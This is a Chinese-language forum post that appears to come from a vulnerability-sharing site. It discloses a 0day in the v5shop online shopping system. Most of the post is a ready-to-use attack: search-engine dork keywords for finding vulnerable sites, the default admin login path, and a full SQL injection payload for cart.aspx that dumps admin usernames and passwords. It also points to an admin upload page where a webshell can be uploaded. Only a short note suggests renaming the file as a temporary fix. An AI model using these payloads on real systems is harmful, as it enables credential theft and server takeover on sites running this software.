QQ群:57116771(8群) 114787622(9群) 85090453(仅限女会员) 110511262(10群) 106039353(4群满) 152020046 (6群)
 106042953(寂寞群牛人坐镇菜鸟绕道你问问题没有人回答你) 102388978(IDC 电话商 网盟专员 个人站长 广告服务等加入)[++pow78781++]|发布漏洞|蚂蚁论坛|关于我们

v5shop 网上商城系统oday

文档分类:脚本攻防/web apps
发表时间:2010-7-7 21:41:57
漏洞添加:sitedir
阅读关键字:nofile.htm

v5shop 网上商城系统oday 漏洞文件:cart.aspx   

关键字:services.aspxid=  
inurl:scoreindex.aspx  

默认后台地址:weblogin/Login.aspx 

以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --


weblogin/System_Config_Operate.aspx  
后台上传水印.可以直接上传大马.  


非安全中国安全建议:
目前官方没有发布相关补丁或升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
www.v5shop.com.cn  (官网网站
临时修复方法,把cart.aspx临时改名


Copyright © www.sitedir.com.cn 2006-2012 Email:vini5[at]163.com 鄂ICP备07011048号 |